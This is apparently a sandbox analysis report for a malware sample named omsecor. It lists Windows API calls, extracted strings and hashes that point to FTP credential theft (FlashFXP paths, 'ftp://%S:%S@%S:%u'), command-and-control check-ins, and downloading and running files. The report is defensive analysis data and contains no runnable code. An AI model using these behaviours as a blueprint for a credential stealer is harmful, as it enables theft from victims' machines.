                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                                                                                                                                                                                                  • API String ID: 3472027048-1081452883
                                                                                                                                                                                                  • Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                                                                                                                                                                                                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,74DF0F00), ref: 00407043
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00407079
                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004070BB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3711279109-0
                                                                                                                                                                                                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                  • String ID: _self$http$+@
                                                                                                                                                                                                  • API String ID: 1473721057-3317424838
                                                                                                                                                                                                  • Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                                                                                                                                                                                                  • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open$CloseQueryValue
                                                                                                                                                                                                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                                                                                                                                                                                                  • API String ID: 3546245721-1332223170
                                                                                                                                                                                                  • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                                                                                                                                                                                                  • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                                                                                                                                                                                                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                                                                                                                                                                                                  • String ID: Shell_TrayWnd$eventConn
                                                                                                                                                                                                  • API String ID: 2141107913-3455059086
                                                                                                                                                                                                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404913
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404925
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404935
                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 00404947
                                                                                                                                                                                                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                  • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                                                                                                                                                                                                  • API String ID: 1635188419-1322549247
                                                                                                                                                                                                  • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                  • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00407387
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                                                                                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3166187867-0
                                                                                                                                                                                                  • Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                                                                                                                                                                                                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: http$+@
                                                                                                                                                                                                  • API String ID: 0-4127549746
                                                                                                                                                                                                  • Opcode ID: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
                                                                                                                                                                                                  • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandFolderOpenPathStrings
                                                                                                                                                                                                  • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                                                                                                                                                                                                  • API String ID: 1994525040-4055253781
                                                                                                                                                                                                  • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                  • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: </domain>$</url>$<domain>$<url>$http://
                                                                                                                                                                                                  • API String ID: 2525500382-924421446
                                                                                                                                                                                                  • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                  • Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                                                                                                                                                                                                  • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$AttemptConnectInternet
                                                                                                                                                                                                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                                                                                                                                                                                                  • API String ID: 362191241-2593661552
                                                                                                                                                                                                  • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                                                                                                                                                                                                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                                                                                                                                                                                                  • __FindPESection.LIBCMT ref: 0040D8AC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 876702719-0
                                                                                                                                                                                                  • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004088E4
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004088E9
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004089D3
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004089D8
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004089F3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID: +@
                                                                                                                                                                                                  • API String ID: 3341692771-3835504741
                                                                                                                                                                                                  • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                  • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • _memset.LIBCMT ref: 004025DA
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                                                                                                                                                                                                  • String ID: none
                                                                                                                                                                                                  • API String ID: 2353737338-2140143823
